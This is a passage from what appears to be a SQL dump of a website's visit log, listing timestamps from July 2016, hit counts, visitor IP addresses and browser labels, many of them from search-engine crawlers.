,'130.193.50.34','other'),(49442,1468794726,1,1,0,0,'141.8.183.25','other'),(49443,1468795870,1,1,0,0,'141.8.183.25','other'),(49444,1468796669,2,2,0,0,'130.193.50.34','other'),(49445,1468797839,1,0,1,0,'66.249.78.178',''),(49446,1468798124,1,1,0,0,'51.255.65.42','other'),(49447,1468800540,1,1,0,0,'130.193.51.19','other'),(49448,1468800818,1,1,0,0,'180.76.15.158','other'),(49449,1468801174,1,1,0,0,'141.8.142.61','other'),(49450,1468801328,1,1,0,0,'40.77.167.9','other'),(49451,1468801596,1,1,0,0,'141.8.142.58','other'),(49452,1468801676,2,2,0,0,'130.193.51.19','other'),(49453,1468801746,3,3,0,0,'141.8.183.25','other'),(49454,1468801821,1,0,1,0,'66.249.78.178',''),(49455,1468803305,2,2,0,0,'130.193.50.34','other'),(49456,1468803710,2,2,0,0,'141.8.183.25','other'),(49457,1468804067,1,0,1,0,'66.249.78.143',''),(49458,1468804427,2,2,0,0,'130.193.50.34','other'),(49459,1468804442,1,1,0,0,'93.158.152.84','other'),(49460,1468804612,1,1,0,0,'141.8.183.25','other'),(49461,1468805202,1,1,0,0,'141.8.142.61','other'),(49462,1468806017,1,1,0,0,'51.255.65.72','other'),(49463,1468806359,4,4,0,0,'130.193.50.34','other'),(49464,1468806371,2,2,0,0,'130.193.51.19','other'),(49465,1468806683,1,1,0,0,'141.8.142.58','other'),(49466,1468809797,2,2,0,0,'130.193.50.34','other'),(49467,1468810338,1,1,0,0,'180.76.15.138','other'),(49468,1468810339,1,1,0,0,'180.76.15.13','other'),(49469,1468810857,1,1,0,0,'130.193.50.34','other'),(49470,1468811360,1,1,0,0,'208.115.113.92','other'),(49471,1468812393,1,1,0,0,'130.193.51.19','other'),(49472,1468812539,1,1,0,0,'141.8.142.58','other'),(49473,1468812540,1,1,0,0,'141.8.183.25','other'),(49474,1468814233,3,3,0,0,'130.193.50.34','other'),(49475,1468814775,1,1,0,0,'141.8.142.67','other'),(49476,1468814824,1,1,0,0,'141.8.142.61','other'),(49477,1468815177,1,1,0,0,'130.193.50.34','other'),(49478,1468815243,1,1,0,0,'141.8.183.25','other'),(49479,1468817946,1,1,0,0,'5.255.253.47','other'),(49480,1468818142,1,1,0,0,'141.8.183.19','other'),(49481,1468818145,1,1,0,0,'130.193.50.4','other'),(49482,1468818168,1,1,0,0,'141.8.142.58','other'),(49483,1468818304,1,0,1,0,'66.249.78.164',''),(49484,1468818370,1,1,0,0,'130.193.37.27','other'),(49485,1468818749,1,1,0,0,'130.193.50.6','other'),(49486,1468818878,1,1,0,0,'130.193.51.14','other'),(49487,1468818899,1,1,0,0,'66.102.9.103','chrome'),(49488,1468819032,1,1,0,0,'178.154.149.10','other'),(49489,1468820403,5,5,0,0,'69.30.213.202','other'),(49490,1468821381,1,1,0,0,'141.8.132.10','other'),(49491,1468821535,1,1,0,0,'141.8.132.30','other'),(49492,1468821863,1,1,0,0,'130.193.50.34','other'),(49493,1468821896,1,1,0,0,'91.196.178.40','firefox'),(49494,1468821938,1,1,0,0,'141.8.142.25','other'),(49495,1468821994,1,1,0,0,'130.193.50.32','other'),(49496,1468822065,2,2,0,0,'5.255.253.36','other'),(49497,1468823019,1,0,1,0,'66.249.78.150',''),(49498,1468823592,1,1,0,0,'82.207.91.234','firefox'),(49499,1468824022,1,1,0,0,'208.115.113.92','other'),(49500,1468824212,1,1,0,0,'51.255.65.15','other'),(49501,1468824797,1,1,0,0,'164.132.161.38','other'),(49502,1468824821,1,1,0,0,'91.196.178.65','chrome'),(49503,1468825314,1,1,0,0,'93.158.152.9','other'),(49504,1468825318,1,1,0,0,'130.193.51.43','other'),(49505,1468825322,1,1,0,0,'130.193.50.34','other'),(49506,1468826167,1,1,0,0,'91.233.49.253','chrome'),(49507,1468826809,1,0,1,0,'66.249.78.143',''),(49508,1468827277,1,1,0,0,'207.46.13.96','other'),(49509,1468827279,1,1,0,0,'94.179.38.55','firefox'),(49510,1468827310,1,1,0,0,'66.249.78.171','chrome'),(49511,1468828042,1,0,1,0,'68.180.230.111',''),(49512,1468828501,1,1,0,0,'151.80.31.157','other'),(49513,1468828887,1,1,0,0,'37.52.20.243','firefox'),(49514,1468829141,1,1,0,0,'180.76.15.27','other'),(49515,1468829196,1,1,0,0,'130.193.51.79','other'),(49516,1468829245,1,1,0,0,'91.196.178.72','firefox'),(49517,1468829257,1,0,1,0,'66.249.78.171',''),(49518,1468829473,3,3,0,0,'69.30.205.218','other'),(49519,1468830608,1,1,0,0,'93.158.152.46','other'),(49520,1468830614,1,1,0,0,'93.158.152.61','other'),(49521,1468830733,1,1,0,0,'141.8.142.25','other'),(49522,1468830860,1,1,0,0,'141.8.132.30','other'),(49523,1468830970,1,1,0,0,'5.255.253.68','other'),(49524,1468830974,1,1,0,0,'141.8.142.88','other'),(49525,1468831017,2,2,0,0,'5.255.253.67','other'),(49526,1468831020,1,1,0,0,'5.255.253.36','other'),(49527,1468831105,1,1,0,0,'141.8.142.85','other'),(49528,1468831329,1,1,0,0,'164.132.161.25','other'),(49529,1468831342,1,1,0,0,'141.8.183.25','other'),(49530,1468832381,1,1,0,0,'91.196.178.131','chrome'),(49531,1468832608,1,1,0,0,'91.196.178.69','chrome'),(49532,1468832813,1,1,0,0,'141.8.183.25','other'),(49533,1468832865,1,1,0,0,'94.179.76.24','chrome'),(49534,1468833352,1,0,1,0,'66.249.78.164',''),(49535,1468833876,1,1,0,0,'82.207.86.67','opera'),(49536,1468834597,1,1,0,0,'180.76.15.12','other'),(49537,1468834663,1,1,0,0,'208.115.113.82','other'),(49538,1468834771,1,1,0,0,'141.8.142.58','other'),(49539,1468834915,1,1,0,0,'164.132.161.22','other'),(49540,1468835067,1,1,0,0,'66.249.78.136','chrome'),(49541,1468835335,1,1,0,0,'164.132.161.83','other'),(49542,1468835474,1,0,1,0,'66.249.78.164',''),(49543,1468835578,1,0,1,0,'66.249.78.178',''),(49544,1468835608,1,0,1,0,'66.249.78.171',''),(49545,1468835719,1,1,0,0,'91.124.25.225','firefox'),(49546,1468835827,1,1,0,0,'46.161.9.11','firefox'),(49547,1468836383,1,1,0,0,'51.255.65.53','other'),(49548,1468836585,1,1,0,0,'212.1.101.100','chrome'),(49549,1468836607,1,1,0,0,'141.8.183.25','other'),(49550,1468836874,1,0,1,0,'66.249.78.164',''),(49551,1468837209,1,1,0,0,'130.193.51.14','other'),(49552,1468837308,1,1,0,0,'93.158.152.75','other'),(49553,1468838443,1,1,0,0,'31.43.24.216','chrome'),(49554,1468839029,1,1,0,0,'91.196.178.169','chrome'),(49555,1468839445,2,2,0,0,'40.77.167.53','other'),(49556,1468839923,1,1,0,0,'141.8.142.58','other'),(49557,1468839931,1,1,0,0,'178.95.245.254','other'),(49558,1468840007,1,1,0,0,'78.111.189.160','chrome'),(49559,1468840258,1,1,0,0,'194.187.218.146','chrome'),(49560,1468840262,1,1,0,0,'66.249.93.98','chrome'),(49561,1468840462,2,2,0,0,'130.193.50.34','other'),(49562,1468840675,1,0,1,0,'68.180.230.178',''),(49563,1468841112,1,1,0,0,'141.0.14.50','other'),(49564,1468842272,1,1,0,0,'91.196.178.72','chrome'),(49565,1468842555,1,1,0,0,'91.196.178.67','opera'),(49566,1468842623,1,0,1,0,'66.249.78.178',''),(49567,1468842626,1,0,1,0,'66.249.78.164',''),(49568,1468843211,1,1,0,0,'91.196.178.66','firefox'),(49569,1468843480,1,1,0,0,'37.55.212.32','chrome'),(49570,1468843794,1,0,1,0,'66.249.78.150',''),(49571,1468844153,1,0,1,0,'66.249.78.171',''),(49572,1468845123,1,1,0,0,'31.43.6.140','firefox'),(49573,1468845163,1,1,0,0,'94.179.31.134','firefox'),(49574,1468845375,1,1,0,0,'66.249.78.178','chrome'),(49575,1468846184,1,1,0,0,'207.46.13.127','other'),(49576,1468846499,1,1,0,0,'217.69.133.223','other'),(49577,1468846837,1,1,0,0,'94.45.110.207','chrome'),(49578,1468847222,1,0,1,0,'66.249.78.164',''),(49579,1468847279,1,1,0,0,'194.44.208.206','chrome'),(49580,1468847311,1,1,0,0,'37.54.17.224','other'),(49581,1468848091,1,1,0,0,'40.77.167.21','other'),(49582,1468848510,1,1,0,0,'92.112.128.160','chrome'),(49583,1468848931,1,1,0,0,'91.196.178.99','chrome'),(49584,1468849056,1,1,0,0,'208.115.113.82','other'),(49585,1468849523,1,0,1,0,'66.249.78.136',''),(49586,1468849922,1,1,0,0,'66.249.93.125','chrome'),(49587,1468850624,1,1,0,0,'180.76.15.162','other'),(49588,1468850735,1,1,0,0,'208.115.113.82','other'),(49589,1468851127,1,1,0,0,'37.55.56.113','chrome'),(49590,1468851187,1,0,1,0,'66.249.78.150',''),(49591,1468851714,1,1,0,0,'164.132.161.78','other'),(49592,1468852842,1,1,0,0,'78.111.189.163','chrome'),(49593,1468853951,1,1,0,0,'91.196.178.72','firefox'),(49594,1468854414,1,1,0,0,'91.196.178.72','chrome'),(49595,1468854539,1,1,0,0,'208.115.113.92','other'),(49596,1468855498,1,1,0,0,'91.196.178.98','chrome'),(49597,1468855607,1,0,1,0,'66.249.78.171',''),(49598,1468856603,1,0,1,0,'66.249.78.178',''),(49599,1468857381,1,0,1,0,'66.249.78.150',''),(49600,1468857554,1,1,0,0,'130.193.51.19','other'),(49601,1468857880,1,1,0,0,'178.95.245.254','other'),(49602,1468858365,1,1,0,0,'141.8.183.25','other'),(49603,1468858476,1,1,0,0,'91.196.178.40','firefox'),(49604,1468858578,1,0,1,0,'66.249.78.143',''),(49605,1468859155,1,1,0,0,'78.111.190.13','chrome'),(49606,1468863597,1,0,1,0,'66.249.78.164',''),(49607,1468865238,1,1,0,0,'51.255.65.56','other'),(49608,1468865461,1,1,0,0,'91.196.178.164','firefox'),(49609,1468865727,1,1,0,0,'180.76.15.21','other'),(49610,1468866419,1,1,0,0,'130.180.209.52','chrome'),(49611,1468866436,1,1,0,0,'212.55.74.52','chrome'),(49612,1468866787,1,0,1,0,'66.249.69.149',''),(49613,1468866898,1,0,1,0,'66.249.69.152',''),(49614,1468867950,1,0,1,0,'66.249.78.171',''),(49615,1468868149,1,1,0,0,'141.8.183.25','other'),(49616,1468868156,1,1,0,0,'78.152.161.118','chrome'),(49617,1468868854,1,1,0,0,'94.179.38.55','chrome'),(49618,1468871327,1,1,0,0,'93.158.152.84','other'),(49619,1468872502,1,1,0,0,'208.115.113.82','other'),(49620,1468872570,1,0,1,0,'66.249.78.150',''),(49621,1468872899,1,1,0,0,'141.8.142.78','other'),(49622,1468873064,1,1,0,0,'93.158.152.9','other'),(49623,1468873095,2,0,2,0,'66.249.78.171',''),(49624,1468873869,1,0,1,0,'66.249.78.178',''),(49625,1468874805,1,1,0,0,'208.115.113.92','other'),(49626,1468875365,1,0,1,0,'66.249.78.178',''),(49627,1468875789,1,1,0,0,'130.193.51.79','other'),(49628,1468877736,1,0,1,0,'66.249.78.164',''),(49629,1468877763,1,0,1,0,'66.249.78.171',''),(49630,1468877977,2,2,0,0,'82.193.127.15','other'),(49631,1468879223,1,1,0,0,'130.193.37.7','other'),(49632,1468880296,1,0,1,0,'66.249.78.178',''),(49633,1468880547,1,0,1,0,'66.249.78.150',''),(49634,1468880839,1,1,0,0,'217.69.133.84','other'),(49635,1468884066,1,0,1,0,'66.249.78.178',''),(49636,1468884393,1,1,0,0,'208.115.113.92','other'),(49637,1468884653,2,0,2,0,'66.249.78.164',''),(49638,1468885894,1,0,1,0,'66.249.66.180',''),(49639,1468886377,1,1,0,0,'66.249.78.136','chrome'),(49640,1468886524,1,1,0,0,'66.249.78.171','chrome'),(49641,1468887044,1,1,0,0,'207.46.13.94','other'),(49642,1468887746,1,1,0,0,'178.140.181.192','msie'),(49643,1468887756,1,1,0,0,'37.204.69.172','msie'),(49644,1468887763,1,1,0,0,'176.77.30.1','msie'),(49645,1468887773,1,1,0,0,'188.32.23.50','msie'),(49646,1468887774,1,1,0,0,'188.244.36.65','msie'),(49647,1468888026,1,1,0,0,'40.77.167.21','other'),(49648,1468888436,1,1,0,0,'130.193.50.38','other'),(49649,1468888551,1,1,0,0,'95.24.61.220','msie'),(49650,1468888552,1,1,0,0,'188.32.245.26','chrome'),(49651,1468888553,1,1,0,0,'95.220.195.161','chrome'),(49652,1468888554,1,1,0,0,'95.221.201.210','chrome'),(49653,1468888557,1,1,0,0,'185.19.21.0','chrome'),(49654,1468888578,1,1,0,0,'93.158.152.84','other'),(49655,1468888934,1,1,0,0,'178.154.189.31','other'),(49656,1468888938,1,1,0,0,'141.8.132.2','other'),(49657,1468889032,1,0,1,0,'68.180.230.178',''),(49658,1468889171,1,1,0,0,'130.193.51.43','other'),(49659,1468890569,2,2,0,0,'51.254.32.67','other'),(49660,1468890938,1,1,0,0,'66.249.69.155','chrome'),(49661,1468891919,1,1,0,0,'180.76.15.141','other'),(49662,1468892702,1,0,1,0,'66.249.78.164',''),(49663,1468892734,1,1,0,0,'51.255.65.86','other'),(49664,1468892766,1,1,0,0,'141.8.142.62','other'),(49665,1468892971,1,1,0,0,'141.8.142.78','other'),(49666,1468893308,1,0,1,0,'66.249.78.150',''),(49667,1468893428,1,0,1,0,'66.249.78.171',''),(49668,1468894974,1,0,1,0,'66.249.78.178',''),(49669,1468895176,1,1,0,0,'164.132.161.86','other'),(49670,1468895981,1,1,0,0,'40.77.167.21','other'),(49671,1468897061,1,1,0,0,'164.132.161.20','other'),(49672,1468897082,1,1,0,0,'93.158.152.51','other'),(49673,1468897304,2,2,0,0,'40.77.167.21','other'),(49674,1468897886,1,1,0,0,'180.76.15.26','other'),(49675,1468898714,1,0,1,0,'66.249.78.136',''),(49676,1468899591,1,0,1,0,'66.249.66.180',''),(49677,1468900448,1,1,0,0,'178.154.189.37','other'),(49678,1468900651,1,1,0,0,'141.8.142.67','other'),(49679,1468901550,1,1,0,0,'164.132.161.13','other'),(49680,1468902865,1,1,0,0,'66.102.9.103','chrome'),(49681,1468903260,1,1,0,0,'130.193.50.34','other'),(49682,1468903559,1,1,0,0,'141.8.183.25','other'),(49683,1468903723,1,1,0,0,'66.249.78.178','chrome'),(49684,1468903744,1,0,1,0,'66.249.78.136',''),(49685,1468903782,1,1,0,0,'180.76.15.160','other'),(49686,1468904164,1,1,0,0,'213.177.107.214','other'),(49687,1468904398,2,0,2,0,'66.249.78.171',''),(49688,1468904580,1,1,0,0,'141.8.183.25','other'),(49689,1468904596,1,1,0,0,'51.255.65.79','other'),(49690,1468904939,1,0,1,0,'66.249.78.178',''),(49691,1468905234,2,2,0,0,'37.139.167.254','chrome'),(49692,1468905281,1,1,0,0,'213.174.11.34','chrome'),(49693,1468905528,1,1,0,0,'217.69.133.223','other'),(49694,1468906608,1,1,0,0,'141.8.142.25','other'),(49695,1468906811,1,1,0,0,'130.193.51.19','other'),(49696,1468906943,1,1,0,0,'130.193.51.74','other'),(49697,1468907092,1,1,0,0,'94.179.51.228','firefox'),(49698,1468907205,1,1,0,0,'51.255.65.96','other'),(49699,1468907264,1,1,0,0,'164.132.161.5','other'),(49700,1468907284,1,1,0,0,'5.255.253.67','other'),(49701,1468908085,1,1,0,0,'151.80.31.108','other'),(49702,1468908414,1,1,0,0,'66.249.78.164','chrome'),(49703,1468908821,1,1,0,0,'40.77.167.21','other'),(49704,1468908911,2,2,0,0,'141.8.142.61','other'),(49705,1468908961,1,1,0,0,'164.132.161.93','other'),(49706,1468909488,2,2,0,0,'130.193.50.34','other'),(49707,1468909689,2,2,0,0,'91.196.178.66','chrome'),(49708,1468909880,1,0,1,0,'66.249.66.177',''),(49709,1468909959,2,2,0,0,'141.8.142.61','other'),(49710,1468910029,1,1,0,0,'66.249.78.178','chrome'),(49711,1468910050,1,1,0,0,'51.255.65.55','other'),(49712,1468910186,2,2,0,0,'141.8.142.58','other'),(49713,1468910252,1,0,1,0,'66.249.66.180',''),(49714,1468910409,1,1,0,0,'208.115.113.92','other'),(49715,1468910649,1,1,0,0,'151.80.31.181','other'),(49716,1468910668,1,1,0,0,'141.8.183.25','other'),(49717,1468911059,1,1,0,0,'93.73.234.193','firefox'),(49718,1468912267,2,0,2,0,'66.249.78.164',''),(49719,1468912635,1,0,1,0,'66.249.78.143',''),(49720,1468913261,1,1,0,0,'151.80.31.160','other'),(49721,1468913557,1,1,0,0,'178.154.149.10','other'),(49722,1468913561,1,1,0,0,'141.8.142.67','other'),(49723,1468913690,1,1,0,0,'164.132.161.70','other'),(49724,1468913962,1,1,0,0,'5.255.253.67','other'),(49725,1468914164,1,1,0,0,'91.233.49.253','chrome'),(49726,1468914249,1,1,0,0,'82.145.221.194','chrome'),(49727,1468914412,1,1,0,0,'141.8.132.30','other'),(49728,1468914441,1,1,0,0,'37.55.237.18','chrome'),(49729,1468914947,1,1,0,0,'91.196.178.134','firefox'),(49730,1468915051,1,1,0,0,'51.255.65.78','other'),(49731,1468915429,2,2,0,0,'66.249.78.171','chrome'),(49732,1468915770,1,0,1,0,'66.249.78.150',''),(49733,1468915921,1,1,0,0,'91.196.178.100','chrome'),(49734,1468915928,1,1,0,0,'91.236.184.19','opera'),(49735,1468916497,1,1,0,0,'141.8.183.14','other'),(49736,1468916829,1,1,0,0,'66.249.78.171','chrome'),(49737,1468917058,1,0,1,0,'66.249.78.143',''),(49738,1468917082,1,1,0,0,'93.158.152.75','other'),(49739,1468917123,1,1,0,0,'31.43.19.41','chrome'),(49740,1468917264,1,1,0,0,'94.179.51.228','firefox'),(49741,1468917347,1,1,0,0,'93.158.152.46','other'),(49742,1468917549,1,1,0,0,'141.8.142.25','other'),(49743,1468917697,1,0,1,0,'66.249.78.178',''),(49744,1468917731,1,1,0,0,'141.0.15.93','other'),(49745,1468917856,1,1,0,0,'66.249.78.178','chrome'),(49746,1468918159,1,1,0,0,'78.152.161.14','firefox'),(49747,1468918395,1,1,0,0,'91.196.178.69','chrome'),(49748,1468919463,1,1,0,0,'194.187.216.12','firefox'),(49749,1468919933,1,1,0,0,'130.193.51.14','other'),(49750,1468920300,1,1,0,0,'91.196.178.67','firefox'),(49751,1468920373,1,1,0,0,'91.196.178.65','chrome'),(49752,1468920907,1,1,0,0,'46.242.81.202','msie'),(49753,1468920908,1,1,0,0,'188.32.245.26','chrome'),(49755,1468920909,1,1,0,0,'178.140.184.235','chrome'),(49756,1468920912,1,1,0,0,'95.221.200.128','chrome'),(49757,1468921125,1,1,0,0,'178.140.181.192','msie'),(49758,1468921135,1,1,0,0,'46.73.190.81','msie'),(49759,1468921139,1,1,0,0,'79.165.162.110','msie'),(49760,1468921140,1,1,0,0,'79.164.122.180','msie'),(49761,1468921144,1,1,0,0,'77.41.42.213','msie'),(49762,1468922281,1,1,0,0,'46.149.84.148','chrome'),(49763,1468922616,1,1,0,0,'93.158.152.40','other'),(49764,1468923383,1,1,0,0,'91.196.178.68','firefox'),(49765,1468923540,1,1,0,0,'91.196.178.168','opera'),(49766,1468923786,1,1,0,0,'130.193.50.38','other'),(49767,1468924159,1,1,0,0,'217.69.133.84','other'),(49768,1468924329,1,1,0,0,'195.64.190.1','chrome'),(49769,1468924334,1,1,0,0,'141.8.132.41','other'),(49770,1468924553,1,1,0,0,'51.255.65.89','other'),(49771,1468924678,1,1,0,0,'130.193.37.21','other'),(49772,1468925202,1,1,0,0,'82.207.91.234','firefox'),(49773,1468925295,1,0,1,0,'66.249.78.136',''),(49774,1468925440,1,1,0,0,'207.46.13.94','other'),(49775,1468926657,1,1,0,0,'91.195.173.121','chrome'),(49776,1468927065,1,1,0,0,'130.193.51.19','other'),(49777,1468927069,1,1,0,0,'141.8.142.61','other'),(49778,1468927622,1,1,0,0,'91.196.178.66','firefox'),(49779,1468927927,1,1,0,0,'195.66.65.86','chrome'),(49780,1468928635,1,1,0,0,'176.122.109.91','chrome'),(49781,1468929503,1,1,0,0,'91.196.178.133','chrome'),(49782,1468929810,1,1,0,0,'176.122.109.91','chrome'),(49783,1468929865,1,1,0,0,'93.158.152.40','other'),(49784,1468930294,1,1,0,0,'141.8.142.25','other'),(49785,1468930443,1,1,0,0,'91.196.178.66','firefox'),(49786,1468930599,2,2,0,0,'141.8.183.25','other'),(49787,1468930655,1,1,0,0,'141.8.132.10','other'),(49788,1468930659,1,1,0,0,'93.158.152.51','other'),(49789,1468930768,1,1,0,0,'130.193.37.27','other'),(49790,1468931056,1,1,0,0,'5.255.253.10','other'),(49791,1468931252,1,1,0,0,'93.158.152.26','other'),(49792,1468931686,1,1,0,0,'66.249.93.117','chrome'),(49793,1468931852,1,0,1,0,'66.249.78.164',''),(49794,1468932074,1,1,0,0,'82.145.223.56','opera'),(49795,1468932172,1,1,0,0,'91.196.178.71','chrome'),(49796,1468932296,1,1,0,0,'95.133.37.30','chrome'),(49797,1468933315,1,1,0,0,'91.196.178.71','chrome'),(49798,1468933520,1,1,0,0,'91.196.178.68','firefox'),(49799,1468933825,1,1,0,0,'66.249.78.178','chrome'),(49800,1468933844,1,1,0,0,'95.132.0.14','chrome'),(49801,1468933868,1,1,0,0,'207.46.13.94','other'),(49802,1468934276,1,1,0,0,'95.135.200.211','chrome'),(49803,1468934517,1,1,0,0,'141.8.142.61','other'),(49804,1468934864,1,1,0,0,'130.193.50.34','other'),(49805,1468935163,1,1,0,0,'141.8.142.25','other'),(49806,1468935392,5,5,0,0,'209.58.178.145','other'),(49807,1468935637,1,1,0,0,'93.158.152.61','other'),(49808,1468935929,1,1,0,0,'130.193.51.79','other'),(49809,1468936021,1,0,1,0,'68.180.230.178',''),(49810,1468936264,1,1,0,0,'176.96.198.174','chrome'),(49811,1468936549,1,0,1,0,'66.249.78.150',''),(49812,1468936644,1,1,0,0,'91.196.178.167','chrome'),(49813,1468936724,1,1,0,0,'178.154.189.37','other'),(49814,1468937303,1,0,1,0,'66.249.75.48',''),(49815,1468937681,1,1,0,0,'208.115.113.82','other'),(49816,1468937901,1,1,0,0,'130.193.50.4','other'),(49817,1468938068,1,1,0,0,'180.76.15.16','other'),(49818,1468938193,1,1,0,0,'5.255.253.47','other'),(49819,1468938448,1,1,0,0,'51.255.65.78','other'),(49820,1468938653,1,1,0,0,'46.200.104.73','chrome'),(49821,1468938701,1,1,0,0,'82.145.211.208','other'),(49822,1468939306,2,2,0,0,'213.108.45.130','firefox'),(49823,1468939564,1,1,0,0,'37.55.175.105','chrome'),(49824,1468939646,1,1,0,0,'91.196.178.69','firefox'),(49825,1468939770,1,1,0,0,'31.43.1.129','firefox'),(49826,1468940576,1,1,0,0,'141.8.142.58','other'),(49827,1468940684,1,1,0,0,'91.196.177.15','chrome'),(49828,1468941824,1,1,0,0,'141.8.142.85','other'),(49829,1468941917,1,1,0,0,'130.193.50.34','other'),(49830,1468941965,1,1,0,0,'178.154.189.37','other'),(49831,1468942194,1,1,0,0,'130.193.51.79','other'),(49832,1468942197,2,2,0,0,'130.193.51.19','other'),(49833,1468942279,1,1,0,0,'141.8.183.25','other'),(49834,1468942463,1,1,0,0,'141.8.142.58','other'),(49835,1468942493,1,1,0,0,'141.8.142.61','other'),(49836,1468942589,1,1,0,0,'141.8.142.67','other'),(49837,1468942794,1,1,0,0,'208.115.113.82','other'),(49838,1468942809,1,1,0,0,'66.249.93.98','chrome'),(49839,1468942957,1,1,0,0,'66.249.93.94','chrome'),(49840,1468943360,1,0,1,0,'66.249.78.136',''),(49841,1468944233,1,1,0,0,'91.124.118.210','firefox'),(49842,1468944612,1,1,0,0,'180.76.15.11','other'),(49843,1468944728,1,1,0,0,'180.76.15.34','other'),(49844,1468945597,1,1,0,0,'93.158.152.51','other'),(49845,1468945691,1,1,0,0,'130.193.51.74','other'),(49846,1468945796,1,1,0,0,'164.132.161.95','other'),(49847,1468945806,1,1,0,0,'141.8.132.30','other'),(49848,1468945893,1,1,0,0,'130.193.50.34','other'),(49849,1468945897,1,1,0,0,'5.255.253.67','other'),(49850,1468946086,1,1,0,0,'93.171.185.110','chrome'),(49851,1468946391,1,1,0,0,'178.154.189.37','other'),(49852,1468946562,1,1,0,0,'37.139.167.254','chrome'),(49853,1468946567,1,1,0,0,'141.8.132.41','other'),(49854,1468946642,1,0,1,0,'66.249.78.178',''),(49855,1468946699,1,1,0,0,'5.255.253.10','other'),(49856,1468946909,1,1,0,0,'141.8.132.52','other'),(49857,1468946913,1,1,0,0,'5.255.253.68','other'),(49858,1468947003,1,1,0,0,'207.46.13.118','other'),(49859,1468948475,1,1,0,0,'130.193.50.34','other'),(49860,1468948670,2,2,0,0,'130.193.51.19','other'),(49861,1468948808,1,1,0,0,'141.8.142.58','other'),(49862,1468949042,1,1,0,0,'207.46.13.118','other'),(49863,1468951077,1,0,1,0,'66.249.78.164',''),(49864,1468951484,4,4,0,0,'88.234.180.74','other'),(49865,1468952075,1,1,0,0,'141.8.142.58','other'),(49866,1468952151,1,1,0,0,'141.8.132.41','other'),(49867,1468952253,1,0,1,0,'68.180.230.178',''),(49868,1468952879,1,1,0,0,'130.193.37.7','other'),(49869,1468952893,1,1,0,0,'130.193.51.79','other'),(49870,1468953057,1,1,0,0,'141.8.183.19','other'),(49871,1468953368,1,0,1,0,'66.249.78.164',''),(49872,1468953543,1,0,1,0,'68.180.230.111',''),(49873,1468954262,1,1,0,0,'164.132.161.45','other'),(49874,1468954478,1,1,0,0,'82.145.216.149','other'),(49875,1468954509,1,0,1,0,'66.249.75.32',''),(49876,1468954648,1,0,1,0,'66.249.69.185',''),(49877,1468954841,1,1,0,0,'91.196.178.163','chrome'),(49878,1468955527,1,1,0,0,'94.179.68.205','firefox'),(49879,1468955886,1,0,1,0,'66.249.78.150',''),(49880,1468955898,1,0,1,0,'66.249.78.136',''),(49881,1468956073,1,0,1,0,'66.249.78.143',''),(49882,1468957397,2,2,0,0,'208.115.113.82','other'),(49883,1468957707,1,0,1,0,'66.249.78.136',''),(49884,1468957760,1,1,0,0,'151.80.31.182','other'),(49885,1468957781,2,2,0,0,'216.38.216.197','chrome'),(49886,1468959702,1,1,0,0,'208.115.113.82','other'),(49887,1468960324,1,1,0,0,'51.255.65.11','other'),(49888,1468960711,1,1,0,0,'164.132.161.75','other'),(49889,1468961126,1,1,0,0,'141.8.142.58','other'),(49890,1468961217,1,0,1,0,'68.180.230.178',''),(49891,1468962530,1,1,0,0,'93.158.152.40','other'),(49892,1468963067,1,1,0,0,'180.76.15.10','other'),(49893,1468964603,1,0,1,0,'66.249.78.143',''),(49894,1468966463,1,0,1,0,'66.249.78.164',''),(49895,1468967171,1,1,0,0,'208.115.113.82','other'),(49896,1468968350,1,1,0,0,'141.8.183.25','other'),(49897,1468969708,1,1,0,0,'180.76.15.141','other'),(49898,1468969932,1,1,0,0,'188.32.71.195','msie'),(49899,1468969984,1,1,0,0,'46.73.190.81','msie'),(49900,1468970112,1,1,0,0,'176.193.106.71','msie'),(49901,1468970607,1,1,0,0,'95.46.246.240','msie'),(49902,1468973130,2,2,0,0,'69.30.221.250','other'),(49903,1468979454,1,1,0,0,'82.145.219.111','other'),(49904,1468979949,1,1,0,0,'180.76.15.156','other'),(49905,1468980060,1,0,1,0,'66.249.78.150',''),(49906,1468985320,1,1,0,0,'51.255.65.83','other'),(49907,1468985525,1,1,0,0,'180.76.15.6','other'),(49908,1468988205,1,1,0,0,'217.69.133.231','other'),(49909,1468988415,1,1,0,0,'51.255.65.28','other'),(49910,1468988518,1,1,0,0,'164.132.161.3','other'),(49911,1468990341,1,1,0,0,'51.255.65.78','other'),(49912,1468991416,1,1,0,0,'92.217.234.65','other'),(49913,1468992089,2,2,0,0,'91.196.178.66','firefox'),(49914,1468992220,1,1,0,0,'91.196.178.70','chrome'),(49915,1468993346,1,1,0,0,'37.139.167.254','chrome'),(49916,1468993545,1,1,0,0,'208.115.113.92','other'),(49917,1468994617,1,1,0,0,'130.193.51.19','other'),(49918,1468994833,1,1,0,0,'66.249.93.117','chrome'),(49919,1468995182,1,1,0,0,'37.53.74.239','firefox'),(49920,1468995399,1,1,0,0,'91.196.178.67','firefox'),(49921,1468995972,1,1,0,0,'208.115.113.82','other'),(49922,1468996667,1,1,0,0,'37.55.251.69','chrome'),(49923,1468998720,1,1,0,0,'82.207.91.234','firefox'),(49924,1468999167,1,1,0,0,'151.80.31.101','other'),(49925,1468999444,1,1,0,0,'217.69.133.231','other'),(49926,1468999520,1,1,0,0,'94.179.71.172','firefox'),(49927,1469000285,1,1,0,0,'91.196.177.44','chrome'),(49928,1469000295,1,1,0,0,'141.8.183.25','other'),(49929,1469000892,1,1,0,0,'66.249.78.150','chrome'),(49930,1469001000,1,1,0,0,'91.196.177.15','chrome'),(49931,1469001015,1,1,0,0,'66.249.78.178','chrome'),(49932,1469001300,1,1,0,0,'91.196.177.44','chrome'),(49933,1469001405,1,1,0,0,'208.115.113.92','other'),(49934,1469001791,1,0,1,0,'66.249.69.152',''),(49935,1469002141,1,1,0,0,'164.132.161.32','other'),(49936,1469003750,1,0,1,0,'66.249.78.136',''),(49937,1469004217,1,1,0,0,'91.196.178.132','chrome'),(49938,1469005750,1,1,0,0,'164.132.161.70','other'),(49939,1469005869,1,0,1,0,'66.249.78.143',''),(49940,1469006355,1,1,0,0,'176.195.114.95','msie'),(49941,1469006385,1,1,0,0,'66.249.78.178','chrome'),(49942,1469007285,1,1,0,0,'141.8.142.61','other'),(49943,1469007411,1,1,0,0,'130.193.51.19','other'),(49944,1469007531,1,1,0,0,'141.8.142.67','other'),(49945,1469007536,1,1,0,0,'141.8.183.25','other'),(49946,1469007812,1,1,0,0,'128.68.61.146','msie'),(49947,1469007817,1,1,0,0,'92.113.174.10','firefox'),(49948,1469007829,1,0,1,0,'66.249.78.150',''),(49949,1469007900,3,3,0,0,'176.9.10.227','other'),(49950,1469008336,1,1,0,0,'77.37.140.222','msie'),(49951,1469008338,1,0,1,0,'66.249.78.164',''),(49952,1469008821,1,1,0,0,'66.249.78.171